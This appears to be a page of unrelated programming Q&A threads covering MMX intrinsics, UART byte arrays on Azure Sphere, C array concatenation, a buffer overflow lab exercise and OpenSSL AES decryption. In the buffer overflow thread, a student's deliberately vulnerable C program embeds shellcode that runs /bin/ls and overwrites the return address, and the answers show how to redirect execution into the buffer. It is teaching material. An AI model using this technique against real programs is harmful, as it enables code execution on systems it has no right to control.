Develop Reference

How to prepare data for use with MMX/SSE intrinsics for shifting 16bit values?

No matter what I do with {0,8,16,0}(16bit vector, representation for copying into a big endian 64bit value) I am unable to properly bit shift a test value of { 0x00, 0x01, (...) 0x07 };
The result I get in the debugger is always 0x0.
I tried to convert the value in a couple of different ways, but I am unable to get this right.
Executed on a little endian:
#include <mmintrin.h>
#include <stdint.h>
int main(int argc, char** argv) {
__m64 input;
__m64 vectors;
__m64 output;
_Alignas(8) uint16_t bit16Vectors[1*4] = {
0x0000,0x0008,0x0010,0x0000
// Intent: {0,8,16,0} 16 bit array
// Convert for copy: {0,16,8,0} 64bit one item
// 8bit data, Bytes need to rotate: {0,8,16,0}
};
_Alignas(8) uint8_t in[8] = {
0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07
};
input = _m_from_int64(*((long long*)in) );
vectors = _m_from_int64 (*((long long*)bit16Vectors));
output = _mm_sll_pi16(input, vectors);
__asm__("int3");
}
I wrote down a simple MMX-only RGB24 plane separation pseudoAssembly[which processes 8x1 values], but I am unable to convert all the 16+32bit bit shift vectors to "real world", or I do something wrong with the intrinsics.
I am unable to pin it down exactly, I just know it fails at the very first bit shift and returns the value of 0x0.

unsigned char array breaks at zero bytes in Azure Sphere SDK when passing to a function

I am using (1)Azure Sphere MT3620 Starter Kit and (2)RS485 CLICK 5V and (3)Geovan Board
Here is the setup (I don't have latest picture, so #2 is swapped to first slot in the MT3620)
My MT3620 is registered all good with Azure IoTHub and pushing all telemetry data to cloud. Now I am trying to sent some HEX commands from MT3620 to Geovan Board via RS485 CLICK 5V
Here is my Calling code
//RS485 to Geovan to Update Registry values
unsigned char updateAllChannelData[] = { 0x01, 0x06, 0x00, 0x19, 0x00, 0x01, 0x99, 0xCD };
SendUartMessage(uartFd, updateAllChannelData, sizeof(updateAllChannelData));
delay(10);
//RS485 to Geovan to Read all channels
unsigned char readAllChannel[] = { 0x01, 0x03, 0x00, 0x01, 0x00, 0x10, 0x15, 0xC6 };
SendUartMessage(uartFd, readAllChannel, sizeof(readAllChannel));
delay(1.5); //20
when data is passed to SendUartMessage both arrays (updateAllChannelData and readAllChannel) breaks at 0x00 so final command being passed to Geovan Board is incomplete and no response is received.
Here is SendUartMessage method
static void SendUartMessage(int uartFd, const char* dataToSend, size_t totalBytesToSend)
{
// dataToSend breaks at 0x00 right here not after executing any lines below
// First command array becomes {0x01, 0x06}
// Second command array becomes {0x01, 0x03}
size_t totalBytesSent = 0;
int sendIterations = 0;
close(r1PinFd);
r1PinFd = GPIO_OpenAsOutput(MIKROE_PWM, GPIO_OutputMode_PushPull, GPIO_Value_High);
while (totalBytesSent < totalBytesToSend) {
sendIterations++;
// Send as much of the remaining data as possible
size_t bytesLeftToSend = totalBytesToSend - totalBytesSent;
const char* remainingMessageToSend = dataToSend + totalBytesSent;
ssize_t bytesSent = write(uartFd, remainingMessageToSend, bytesLeftToSend);
if (bytesSent == -1) {
Log_Debug("ERROR: Could not write to UART: %s (%d).\n", strerror(errno), errno);
exitCode = ExitCode_SendMessage_Write;
return;
}
totalBytesSent += (size_t)bytesSent;
}
int c, d;
sleep(5);
close(r1PinFd);
r1PinFd = GPIO_OpenAsOutput(MIKROE_PWM, GPIO_OutputMode_PushPull, GPIO_Value_Low);
Log_Debug("Sent %zu bytes over UART in %d calls.\n", totalBytesSent, sendIterations);
}
FYI: I have tested these commands as below
Connect Geovan directly to PC
using Hercules SETUP utility open com port on which Geovan is connected
send HEX command "0x01, 0x06, 0x00, 0x19, 0x00, 0x01, 0x99, 0xCD" wait 10 seconds
send HEX command "0x01, 0x03, 0x00, 0x01, 0x00, 0x10, 0x15, 0xC6" wait 10 seconds
received expected response
This confirms from Geovan these commands as sent and responded correctly. So the challenge is sending same commands from MT3620 through RS485 CLICK 5V to Geovan Board.
Can someone point out the what am I missing over here?
Update:
Before stepping in to function, this is how my array looks
After stepping in to the function, this is what it looks like

Concatenate array with define and varaible - c language

I am looking for a solution to concatenate in a array with value from defines and variable. I have already try with memcpy like that but it not working :
#define ADDRESS {0x00, 0x00, 0x00, 0x00, 0x00, 0x45}
#define SIGNATURE {0xC6, 0x54, 0x2D}
uint8_t packetCounter = 0;
uint8_t RadioData[2]={'2','1'};
uint8_t Packet = sizeof(uint8_t);
memcpy(Packet, ADDRESS, sizeof(ADDRESS));
memcpy(Packet, SIGNATURE, sizeof(SIGNATURE));
memcpy(Packet, packetCounter, sizeof(packetCounter));
memcpy(Packet, data, sizeof(data));
The goal of this code is to have an array with those value : ADDRESS+SIGNATURE+packetCounter+data. And I would like also to add "_" between each variable after.
Do you have any solution?
Thanks

It's not entirely clear what it is you want, but maybe something like this?
#include <stdint.h>
#define ADDRESS 0x00, 0x00, 0x00, 0x00, 0x00, 0x45
#define SIGNATURE 0xC6, 0x54, 0x2D
void Some_Function(void) {
uint8_t packetCounter = 0;
uint8_t RadioData[2]={'2','1'};
uint8_t Packet[] = {ADDRESS, SIGNATURE, packetCounter, RadioData[0], RadioData[1]};
}

Your problem is that Packet is an integer variable. The memcpy needs a pointer, not an integer variable. Your trying to copy a lot of bytes to a single byte location.

The quick and easy way worked fine for me. I see the exact bytes in the packet, in my debugger.
#include <vector>
#define ADDRESS {0x00, 0x00, 0x00, 0x00, 0x00, 0x45}
#define SIGNATURE {0xC6, 0x54, 0x2D}
uint8_t address[] ADDRESS;
uint8_t signature[] SIGNATURE;
uint8_t packetCounter = 0;
uint8_t RadioData[2] = { '2','1' };
int main() {
std::vector<uint8_t> packet;
std::copy(std::begin(address), std::end(address), std::back_inserter(packet));
std::copy(std::begin(signature), std::end(signature), std::back_inserter(packet));
packet.push_back(packetCounter);
std::copy(std::begin(RadioData), std::end(RadioData), std::back_inserter(packet));
// packet now has the bytes expected
return 0;
}
This is c++, although the question had both tags. I can put them in a malloc'ed area just as easily if you need C. Also the #define is completely unnecessary. I'd rather just define static const arrays.
I probably would have used unsigned char or char, possibly with a static assert if they need to be 8 bit.

Buffer overflow: execute char array loaded into memory

I'm an ethical hacking student and have been given this as an exercise. I've been stuck on it for two days now.
We're writing a program that is purposely vulnerable to a "buffer overflow".
#include <stdio.h>
void badf(int n, char c, char* buffer)
{
char mycode[] = {
0xeb, 0x0f, 0xb8, 0x0b,
0x00, 0x00, 0x00, 0x8b,
0x1c, 0x24, 0x8d, 0x0c,
0x24, 0x31, 0xd2, 0xcd,
0x80, 0xe8, 0xec, 0xff,
0xff, 0xff, 0x2f, 0x62,
0x69, 0x6e, 0x2f, 0x6c,
0x73, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00
}; // 37 bytes
int i;
// Copy mycode array into buffer array
for (i=0; i<n; i++)
{
buffer[i]=mycode[i];
}
// Overwrite Base Pointer
buffer[37] = 0x00;
buffer[38] = 0x00;
buffer[39] = 0x00;
buffer[40] = 0x00;
// Overwrite Instruction Pointer
buffer[41] = 0x90;
buffer[42] = 0x83;
buffer[43] = 0x04;
buffer[44] = 0x08;
}
void f(int n, char c)
{
char buffer[37];
badf(n,c,buffer);
}
void test()
{
printf("test\n");
}
int main()
{
f(37,0x00);
return 0;
}
The mycode array contains "malicious" machine code (it actually just calls execv with /bin/ls). badf is the "vulnerable" function. At the moment you can see I'm overwriting the Base Pointer with 0x00s and the Instuction Pointer with 0x08048390 which is the address of the test() function. This works, 'test' is printed to the terminal.
Now my next exercise is to "use ddd to find the address of your code array and modify the C to write this address over the instruction pointer, as you did in the previous step".
What I don't understand, is how I can use ddd to find the address of my code array. I can easily find the address where the array is moved to BP:
0x08048260 <badf+12>: movb $0xeb,-0x29(%ebp)
0x08048264 <badf+16>: movb $0xf,-0x28(%ebp)
0x08048268 <badf+20>: movb $0xb8,-0x27(%ebp)
.....
Or where it is copied into the buffer array:
0x080482f4 <badf+160>: movl $0x0,-0x4(%ebp)
0x080482fb <badf+167>: jmp 0x8048316 <badf+194>
0x080482fd <badf+169>: mov -0x4(%ebp),%edx
0x08048300 <badf+172>: mov 0x10(%ebp),%eax
.....
But of course this is not what we're looking for.
How can I find the Instruction Pointer address to execute machine code that has been loaded in by writing it in the buffer array this way?
edit: ddd is the debugger we're using, also note we're working with a 32bit linux. The code is compiled with -fno-stack-operator flag, disabling the compilers auto-checks for buffer overflows.

Since you copy myCode into the buffer, you could simply use buffer itself:
Assuming a little-endian machine:
// Overwrite Instruction Pointer
buffer[41] = (char)(((uintptr_t)buffer) >> 0);
buffer[42] = (char)(((uintptr_t)buffer) >> 8);
buffer[43] = (char)(((uintptr_t)buffer) >> 16);
buffer[44] = (char)(((uintptr_t)buffer) >> 24);

I don't know how to do it with ddd, but you could modify badf to print mycode address by using a print statement like this:
printf("mycode address: %p", (void *) mycode);
See what that prints, and just write that to instruction pointer

AES Plaintext to Ciphertext Encryption

I am currently working through Practical Cryptography and am trying to do the exercises at the end of chapter 4. There are a couple of of questions that ask you to decrypt a bit of ciphertext in hex with a key also in hex. I am using the openssl crypto libraries to try and accomplish this.
I am having trouble knowing whether I have done this correctly as I have done it a number of ways and I get different answers. Also because the values provided are in hex I am having a bit of a hard time getting them into a usable value.
I am just using printf to put the hex values into a string. This seems correct to me as I can read them out again and they are correct. The key is harder, I am trying to store the numbers directly into the key structure provided by openssl but I dont know how the openssl implementation uses the key structure.
My code is below. If I run it in this format I get the following output.
In : 0x53:0x9b:0x33:0x3b:0x39:0x70:0x6d:0x14:0x90:0x28:0xcf:0xe1:0xd9:0xd4:0xa4:0x7
Out: 0xea:0xb4:0x1b:0xfe:0x47:0x4c:0xb3:0x2e:0xa8:0xe7:0x31:0xf6:0xdb:0x98:0x4e:0xe2
My questions are:
Does my method of storing the key look correct?
Does my overall method look correct?
Does anyone know what the actual answer should be?
Code below
int main( void )
{
unsigned char InStr [100];
unsigned char OutStr[100];
char KeyStr[100];
AES_KEY Key;
Key.rd_key[0] = 0x8000000000000000;
Key.rd_key[1] = 0x0000000000000000;
Key.rd_key[2] = 0x0000000000000000;
Key.rd_key[3] = 0x0000000000000001;
Key.rounds = 14;
sprintf( InStr, "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c\0",
0x53, 0x9B, 0x33, 0x3B, 0x39, 0x70, 0x6D, 0x14,
0x90, 0x28, 0xCF, 0xE1, 0xD9, 0xD4, 0xA4, 0x07 );
AES_decrypt( InStr, OutStr, &Key );
printf( "In : %#hx:%#hx:%#hx:%#hx:%#hx:%#hx:%#hx:%#hx:%#hx:%#hx:%#hx:%#hx:%#hx:%#hx:%#hx:%#hx\n",
InStr[0], InStr[1], InStr[2], InStr[3], InStr[4], InStr[5], InStr[6], InStr[7],
InStr[8], InStr[9], InStr[10], InStr[11], InStr[12], InStr[13], InStr[14], InStr[15] );
printf( "Out: %#hx:%#hx:%#hx:%#hx:%#hx:%#hx:%#hx:%#hx:%#hx:%#hx:%#hx:%#hx:%#hx:%#hx:%#hx:%#hx\n",
OutStr[0], OutStr[1], OutStr[2], OutStr[3], OutStr[4], OutStr[5], OutStr[6], OutStr[7],
OutStr[8], OutStr[9], OutStr[10], OutStr[11], OutStr[12], OutStr[13], OutStr[14], OutStr[15] );
return 0;
}